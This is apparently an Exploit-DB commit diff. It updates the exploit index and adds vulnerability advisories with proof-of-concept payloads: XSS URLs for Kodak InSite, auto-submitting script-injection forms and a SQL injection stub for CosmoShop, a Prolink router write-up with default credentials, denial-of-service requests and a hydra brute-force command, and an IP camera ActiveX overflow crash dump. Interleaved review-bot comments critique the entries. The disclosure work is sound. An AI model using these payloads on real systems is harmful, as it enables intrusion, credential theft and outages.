Updated 12_03_2014

This commit is contained in:
Offensive Security 2014-12-03 04:52:35 +00:00
parent 4895daea3f
commit 5a0a6520d2
21 changed files with 1663 additions and 4 deletions


@ -28757,7 +28757,7 @@ id,file,description,date,author,platform,type,port
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80 31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80
31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0 31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,"Juan Sacco",windows,local,0
31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0
31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection Vulnerability",2014-03-01,Portcullis,windows,webapps,8080 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Stored XSS Vulnerability",2014-03-01,Portcullis,windows,webapps,8080 31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Stored XSS Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
@ -30577,7 +30577,7 @@ id,file,description,date,author,platform,type,port
33949,platforms/linux/remote/33949.txt,"PCRE <= 6.2 Regular Expression Compiling Workspace Buffer Overflow Vulnerability",2010-05-06,"Michael Santos",linux,remote,0 33949,platforms/linux/remote/33949.txt,"PCRE <= 6.2 Regular Expression Compiling Workspace Buffer Overflow Vulnerability",2010-05-06,"Michael Santos",linux,remote,0
33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection Vulnerability",2010-01-31,s4r4d0,php,webapps,0 33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection Vulnerability",2010-01-31,s4r4d0,php,webapps,0
33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0
33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80 33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,"Juan Sacco",php,webapps,80
33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
33957,platforms/php/webapps/33957.txt,"kloNews 2.0 'cat.php' Cross Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 'cat.php' Cross Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0
33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
@ -31176,7 +31176,7 @@ id,file,description,date,author,platform,type,port
34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0
34621,platforms/unix/remote/34621.c,"Mozilla Firefox <= 3.6.8 'Math.random()' Cross Domain Information Disclosure Vulnerability",2010-09-14,"Amit Klein",unix,remote,0 34621,platforms/unix/remote/34621.c,"Mozilla Firefox <= 3.6.8 'Math.random()' Cross Domain Information Disclosure Vulnerability",2010-09-14,"Amit Klein",unix,remote,0
34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 Directory Traversal Vulnerability",2010-09-15,"Bogdan Calin",windows,remote,0 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 Directory Traversal Vulnerability",2010-09-15,"Bogdan Calin",windows,remote,0
34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,Provensec,php,webapps,80 34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,"Juan Sacco",php,webapps,80
34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900
34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0
@ -31736,7 +31736,7 @@ id,file,description,date,author,platform,type,port
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0 35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0 35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0 35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Insecure Temporary File Creation Vulnerability Privilege Escalation",2014-11-14,skynet-13,linux,local,0 35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,metasploit,windows,local,0 35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,metasploit,windows,local,0
35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0 35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80 35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
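Review bot: the retitling of 35234 drops the root cause: the old description "OSSEC 2.8 - Insecure Temporary File Creation Vulnerability Privilege Escalation" told a reader the weakness class, while "OSSEC 2.8 - Privilege Escalation" does not. Suggest keeping both in a shorter form, e.g. "OSSEC 2.8 - Insecure Temporary File Creation Privilege Escalation", so the CSV stays searchable by weakness. While in this hunk, the unchanged row for 35237 spells "pararm" where "param" is meant.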
@ -31892,3 +31892,23 @@ id,file,description,date,author,platform,type,port
35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0 35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0
35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter XSS",2011-03-07,Dionach,asp,webapps,0
35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 Pages/login.aspx Language Parameter XSS",2011-03-07,Dionach,asp,webapps,0
35413,platforms/php/webapps/35413.php,"WordPress <=4.0 Denial of Service Exploit",2014-12-01,SECURELI.com,php,webapps,80
35414,platforms/php/webapps/35414.txt,"Wordpress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80
35415,platforms/php/webapps/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80
35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 'basicstats.php' Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0
35417,platforms/php/webapps/35417.php,"WS Interactive Automne 4.1 'admin/upload-controler.php' Remote Arbitrary File Upload Vulnerability",2011-03-08,"AutoSec Tools",php,webapps,0
35418,platforms/php/webapps/35418.txt,"Inline Gallery WordPress Plugin 0.3.9 'do' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35419,platforms/hardware/webapps/35419.txt,"Prolink PRN2001 - Multiple Vulnerabilities",2014-12-02,"Herman Groeneveld",hardware,webapps,0
35420,platforms/hardware/webapps/35420.txt,"IPUX Cube Type CS303C IP Camera - (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 '.m3u' File Remote Stack Buffer Overflow Vulnerability",2011-03-09,KedAns-Dz,osx,remote,0
35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 'image' Parameter Cross Site Scripting Vulnerability",2011-03-10,"High-Tech Bridge SA",php,webapps,0
35436,platforms/php/webapps/35436.txt,"Xinha 0.96 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0
35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite HTTP Packet Denial Of Service Vulnerability",2011-02-09,"Rodrigo Escobar",multiple,dos,0
35438,platforms/cgi/webapps/35438.txt,"CosmoShop V10.05.00 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0
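Review bot: rows 35413 and 35414 name the same product inconsistently, "WordPress <=4.0" versus "Wordpress < 4.0.1", mixing capitalisation and version-range notation; suggest "WordPress" in both and one convention for the range. The port column is also inconsistent within this hunk: the webapps rows 35411/35412 and 35416 to 35418 carry 0 while 35413 to 35415 carry 80. If the column is meant to hold the default service port, the Kodak InSite and PHP entries should use 80 as well; otherwise 0 should be used throughout so the field can be filtered on.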



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46762/info
Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Kodak InSite 5.5.2 is vulnerable; other versions may also be affected.
http://www.example.com/Troubleshooting/DiagnosticReport.asp?HeaderWarning=<script>alert("XSS!")</script>&Language=en&rflp=true#
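Review bot: the advisory text stops at "other versions may also be affected" and records no vendor response or fixed version, so a reader cannot tell whether Kodak InSite 5.5.2 is the last affected build or whether a patch exists. Suggest adding a vendor-status line (fixed version, or "unknown") next to the source reference; the BID link is currently the only remediation pointer in the file. The CSV row for this entry names the HeaderWarning parameter, and the file should say so too rather than leaving the reader to infer it from the URL.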


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46762/info
Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Kodak InSite 5.5.2 is vulnerable; other versions may also be affected.
http://www.example.com/Pages/login.aspx?SessionTimeout=False&Language=de%26rflp=True&#039;,&#039;00000000-0000-0000-0000-000000000000&#039;); alert(&#039;XSS!&#039;); return false; a(&#039;
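Review bot: the PoC URL on the last line carries `&#039;` sequences, an HTML-entity artefact from copying the SecurityFocus page, so the file as committed does not record the string as it was published in BID 46762. Suggest storing the characters the source actually used so the archived record matches the reference; the sibling file 35411 in this commit does not have the problem. As with 35411, there is no vendor-status line.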

platforms/cgi/webapps/35438.txt Executable file

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/46828/info
CosmoShop is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CosmoShop ePRO V10.05.00 is vulnerable; other versions may also be affected.
http://www.example.com/cgi-bin/admin/index.cgi?action=menu&id=eco'+SQL_CODE&hId=eco
<form action="http://www.example.com/cgi-bin/admin/edit_startseitentext.cgi" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="setup" value="allgemein">
<input type="hidden" name="action" value="save">
<input type="hidden" name="use_wwe" value="1">
<input type="hidden" name="file-de" value="startseitentext_de.txt">
<input type="hidden" name="text-de" value='page html"><script>alert(document.cookie)</script>'>
</form>
<script>
document.main.submit();
</script>
http://www.example.com/cgi-bin/admin/rubrikadmin.cgi?action=edit&rubnum=angebote&rcopy="><script>alert(document.cookie)</script>&expand=,angebote
http://www.example.com/cgi-bin/admin/artikeladmin.cgi?action=artikelsuche&typ=bearbeiten"><script>alert(document.cookie)</script>&hId=daten.artikel
http://www.example.com/cgi-bin/admin/shophilfe_suche.cgi?sprache=de&suchbegriff=1"><script>alert(document.cookie)</script>
<form action="http://www.example.com/cgi-bin/admin/setup_edit.cgi" method="post" name="main">
<input type="hidden" name="setup" value="allgemein">
<input type="hidden" name="hId" value="setup.einstellungen.allgemein">
<input type="hidden" name="setup_key" value="allgemein">
<input type="hidden" name="shoptitel" value="Cosmoshop Shopsoftware 10.x">
<input type="hidden" name="shopbetreiber" value="email@example.com">
<input type="hidden" name="shop_bestellempfaenger" value="email@example.com">
<input type="hidden" name="anfrage_mail" value="email@example.com">
<input type="hidden" name="shop_umstid" value="DE12345678">
<input type="hidden" name="shop_eg" value="1">
<input type="hidden" name="auftragszaehler" value="1">
<input type="hidden" name="hauptwaehrung" value='EUR"><script>alert(document.cookie)</script>'>
<input type="hidden" name="nebenwaehrung" value="$">
<input type="hidden" name="eurofaktor" value="0.7">
<input type="hidden" name="mindestpreisdm" value="10">
<input type="hidden" name="emis_bestellempfaenger" value="">
<input type="hidden" name="afs_bestellempfaenger" value="">
<input type="hidden" name="ean_in_ausf" value="1">
<input type="hidden" name="google_verify_code" value="">
<input type="hidden" name="save_it" value="abspeichern">
</form>
<script>
document.main.submit();
</script>
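Review bot: every vector listed sits under /cgi-bin/admin/ (index.cgi, edit_startseitentext.cgi, rubrikadmin.cgi, artikeladmin.cgi, shophilfe_suche.cgi, setup_edit.cgi), so the cross-site scripting and SQL injection described require an authenticated shop-administrator session, yet the description only says the application "fails to sufficiently sanitize user-supplied input". Suggest stating the authentication prerequisite explicitly, since it changes the exposure from anonymous to post-authentication and is what a defender needs to rate the issue. Also, `SQL_CODE` on the index.cgi line and the `email@example.com` / `DE12345678` values in the setup_edit.cgi form are placeholders and should be marked as such so they are not mistaken for tested input.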


@ -0,0 +1,273 @@
Exploit Title: Prolink PRN2001 Multiple Vulnerabilities
1. -Advisory Information-
Title: Prolink PRN2001 Multiple Vulnerabilities
Firmware: Ver 1.2
Firmware URL: http://www.prolink2u.com/download/fw/fw_PRN2001_V1.2_20130323.zip
Vendor Homepage: http://www.prolink2u.com/
Author: Herman Groeneveld aka sh4d0wman
Tested On: Windows 7 / Kali
Date published: Dec 01 2014
Release mode: Coordinated release
2. -Vulnerability Information-
PROLiNK® PRN2001 Wireless- N Broadband AP / Router is the ideal wireless solution most suited for home and small-businesses. Designed to support wireless speeds of up to 150Mbps, the PRN2001 offers stellar performance on the 2.4GHz frequency band. This top-notch home networking device functions as an Access Point, Router or a Universal Repeater.
Multiple vulnerabilities have been discovered in this router. The majority require a valid account on the device to exploit. Default credentials are: admin/password
In the default configuration all vulnerabilities are restricted to exploitation over the LAN/WLAN interfaces. A successful compromise would give an attacker full control over the device. This would enable an attacker to enable remote device management over the WAN interface.
3. - Technical Description / Proof of Concept Code -
Introduction:
The following type of vulnerabilities have been discovered in the device:
- 3.1: CWE-286: Incorrect User Management
- 3.2: CWE-668: Exposure of Resource to Wrong Sphere
- 3.3: CWE-200: Information Exposure
- 3.4: CWE- 80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
- 3.5: CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service
- 3.6: CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration
Technical Description:
--------------------------------------------------------------
3.1 -Class: CWE-286: Incorrect User Management-
Description: insufficient separation of privileges. Any account with user-level privileges has the following privileges in the web-management interface:
- Create new users with administrative privileges
- Upgrade the device firmware
- Download and upload configuration files
PoC: users could escalate their privileges by creating a new account.
--------------------------------------------------------------
3.2 -CWE-668: Exposure of Resource to Wrong Sphere-
Description: a user-level account is not restricted from exporting or importing a device configuration file. The configuration file "config.img" is stored as plain-text XML. This is the root cause for the following vulnerabilities:
---------------------------------------------------------------
Name: privilege escalation through device configuration file
Description: the plaintext XML configuration file leaks the administrative user and password of the device giving an attacker full control over the device.
PoC: administrative accounts have Flag value 0x0:
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="password"/>
<V N="PRIORITY" V="0x2"/>
</chain>
---------------------------------------------------------------
Name: telnet privilege escalation through device configuration file
Description: in the plaintext XML configuration file any administrative user account is set to: <V N="PRIORITY" V="0x2"/>. When this value is changed to <V N="PRIORITY" V="0x1"/> the account gains the following additional command options in a telnet shell:
- chksum: Check sum checking. Syntax: chksum address length
- dhcp: Enable DHCP client
- disable: Turn off privileged commands
- enable: Turn on privileged commands
- loaddll: Unknown functionality / DoS: issuing loaddll crashes the device
- script: Run specified script
- system: Show general system information
- webdll: Unknown functionality
- xfile: File copy functionality
- xip: Resolve dns
--------------------------------------------------------------
3.3 -CWE-200: Information Exposure-
Description: the device is leaking various kinds of sensitive information which can aid the attacker in vulnerability discovery and/or escalate privileges.
Vulnerable Functions:
--------------------------------------------------------------
Name: configuration-file sensitive information disclosure
Description: the XML configuration file "config.img" can be exported by user-level accounts and is stored as plain-text. The following sensitive information is leaked:
Confidentiality Related:
- Plaintext administrative credentials
- Plaintext user-level credentials
- Plaintext PPoE WAN credentials
- Plaintext WEP key | WPA PSK | WSC Pin
Device Integrity Related:
- Create, Modify or Delete accounts:
PoC: change anything inside the chain or delete the complete chain:
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="password"/>
<V N="PRIORITY" V="0x2"/>
</chain>
- Enabling Device Management over WAN:
PoC: modify NATRULE_INSRC_STATIC to allow web and or telnet device management over the WAN port.
- DNS traffic redirection:
PoC: modify DHCP Assigned DNS settings to point clients to a rogue DNS server.
--------------------------------------------------------------
Name: log-file sensitive information disclosure
Description: logging is disabled by default. When it is enabled any valid user-level or administrative accounts can view this log through the web-management interface. Invalid logon attempts show the username and invalid passwords in plaintext. If a user does misspell his password an attacker has a high chance of guessing the correct password.
Data Exposed:
- Usernames
- Passwords (partial)
--------------------------------------------------------------
Name: telnet sensitive information disclosure
Description: the telnet command "show web" lists the complete web structure which can aid an attacker in vulnerability discovery.
PoC: the following URL's are leaked and not available through the default web-management interface:
- dhcpvendortbl_withoutcheck.htm
- debug.htm
--------------------------------------------------------------
3.4 -CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)-
Description: the web-based device management interface is vulnerable to persistent XSS attacks caused by insufficient input validation. A valid account on the router is needed to exploit the vulnerabilities.
Vulnerable Functions:
--------------------------------------------------------------
URL: ddns.htm
Field(s): hostname, username
PoC: insert into both fields: <script>alert(String.fromCharCode(88,83,83));</script>
XSS Execution:
- When the dyndns settings page is requested in the web-interface
- if logging is enabled: loading the system log in the web-interface
--------------------------------------------------------------
URL: login.htm
Fields: username
PoC: insert as username: <script>alert(String.fromCharCode(88,83,83));</script>
XSS Execution:
- if logging is enabled: loading the system log in the web-interface
--------------------------------------------------------------
URL: config.img
Field(s): any of the above values but modified through the configuration file (XML).
Description: the configuration file is stored in plain-text. Above injection can be carried out by inserting the XSS test-string into XML elements. Execution takes place inside the web-management interface when browsed to the vulnerable url's.
XSS Execution:
- same locations as previous disclosed injections but in XML, username injection example:
<V N="USERNAME" V="[XSS Inject Here]"/>
<V N="PASSWORD" V="test"/>
--------------------------------------------------------------
3.5 -CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service-
Description: un-authenticated and authenticated users can perform various actions which result in the router crashing and rebooting. In this process all LAN, WAN and Wireless connections are dropped.
Vulnerable Functions:
--------------------------------------------------------------
Name: Unauthenticated device DoS
Description: sending a request to [device ip]/autboot.htm in the web-management interface will initiate a factory-default reboot. In this process all LAN, WAN and Wireless connections are dropped. Device settings however remain unchanged.
PoC: GET request to [deviceip]/autoboot.htm
--------------------------------------------------------------
Name: Authenticated device DoS through invalid firmware update
Description: authenticated users could crash the device by uploading a large file as firmware upgrade. The device has no checks in place before the upload is accepted. After a certain amount of data is uploaded the device will initiate a reboot, most likely to resource exhaustion of either the memory or local disk space.
PoC: upload any big file as firmware image
--------------------------------------------------------------
Name: Authenticated Telnet custom command device DoS
Description: various custom telnet commands can be unlocked through the configuration file. Executing the "loaddll" command without any parameters will crash and reboot the device.
PoC: gain special privileges and issue the loaddll inside the telnet shell
--------------------------------------------------------------
Name: Authenticated NTP Date HTTP Request device DoS
Description: the web-management interface allows time configuration by authenticated users. If certain parts are modified the device will crash and reboot.
PoC: POST form2systime.cgi?year=1975&month=Jan&day=1&hour=0&min=19&sec=24&daylightsaving=6&submit.htm%3Ftime.htm=send
Insert junk (for example: A*400) in Year, Month or Day and the device will crash.
--------------------------------------------------------------
3.6 -CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration-
Description: various configuration settings do not conform to general recommended security best practices weakening the device's security posture.
Vulnerable Functions:
--------------------------------------------------------------
Name: configuration error
Description: when new user accounts are created through the web-management interface the default permissions are root-level and these can't be changed to user-level. However intercepting the HTTP request and modifying the permissions parameter to user-level results in the creation of a user account with user-level privileges. Parts of the web management interface will be restricted.
PoC: enter a valid name and password, change the privilege level to 1 (root priv) or 2 (user priv):
username=[name]&privilege=[2]&newpass=[pass]&confpass=[pass]&adduser=Add&hiddenpass=$submit.htm%Fuserconfig.htm=Send
--------------------------------------------------------------
Name: unencrypted device management protocols
Description: the router can be managed either through the web-management interface which sends HTTP traffic or by Telnet. Both protocols use plaintext communications which could allow an attacker to intercept and/or modify this traffic.
--------------------------------------------------------------
Name: password complexity and lockout policy
Description: no password complexity is enforced, the minimum length is 1 character. No lockout mechanism does exist for the web-management interface. This enables an attacker to guess a correct username / password combination through password guessing or brute-forcing. Weak passwords give an attacker a higher chance of success.
The telnet service features a lockout policy; it disconnects any client after three wrong login attempts.
PoC: hydra [ip] -l admin -P /root/Desktop/pass.txt -f -v -t 1 http-post-form '/login.cgi:username=^USER^&password=^PASS^&submit.htm%3Flogin.htm=Send:F=Username or password error'
--------------------------------------------------------------
4. -Vendor Information, Solutions and Workarounds-
Date 10-10-2014 - Vulnerabilities discovered
Date 20-10-2014 - Contacted vendor by e-mail for responsble disclosure, informed them of release date December 1st 2014
No Reply
Date 01-11-2014 - Contacted vendor by e-mail
No Reply
Date 15-11-2014 - Contacted vendor by e-mail
No Reply
Date 01-12-2014 - Public Disclosure
5. -Author-
This vulnerability was discovered and researched by: Herman Groeneveld aka sh4d0wman
I am a freelance security consultant / researcher based in Phnom Penh
Looking for career opportunities, fellow researchers, help in unpacking the encrypted firmware :-)
herman_worldwide [at] hotmail [.co]m
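Review bot: the unauthenticated DoS entry in 3.5 names the endpoint two ways, "autboot.htm" in the description and "autoboot.htm" in the PoC line directly below it; one is a typo and the file should settle on the spelling that was actually tested. The same entry says the request initiates a "factory-default reboot" and then that "Device settings however remain unchanged", which is contradictory; "reboot" alone matches the behaviour described. Smaller points: the userconfig.htm PoC in 3.6 has `%Fuserconfig.htm`, which is not valid percent-encoding (the login PoC later in the same section uses `%3F`); "PPoE" in 3.3 should read "PPPoE"; and "responsble" in the timeline should read "responsible".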


@ -0,0 +1,273 @@
?
IPUX Cube Type CS303C IP Camera (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow
Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
Product web page: http://www.ipux.net | http://www.fitivision.com
Affected version: Cube Type ICS303C (firmware: ICS303C 1.0.0-17 20140120 r1511)
Summary: The device is Day and Night Cube Network camera with CMOS sensor. With
Motion JPEG video compression, the file size of video stream is extremely reduced,
as to optimize the network bandwidth efficiency. It has 3X digital zoom feature for
a larger space monitoring. The ICS303C comes with a IR-cut filter and 4 built-in IR
illuminators for both day and night applications.
Desc: The UltraMJCam ActiveX Control 'UltraMJCamX.ocx' suffers from a stack buffer
overflow vulnerability when parsing large amount of bytes to several functions in
UltraMJCamLib, resulting in memory corruption overwriting several registers including
the SEH. An attacker can gain access to the system of the affected node and execute
arbitrary code.
----------------------------------------------------------------------------------
(48d0.2e98): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraMJCamX.ocx -
eax=41414149 ebx=00000001 ecx=00002e98 edx=02636d5b esi=41414141 edi=02636d5b
eip=7796466c esp=0038ebf4 ebp=0038ec28 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
ntdll!RtlDeleteCriticalSection+0x77:
7796466c 833800 cmp dword ptr [eax],0 ds:002b:41414149=????????
----------------------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5214
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5214.php
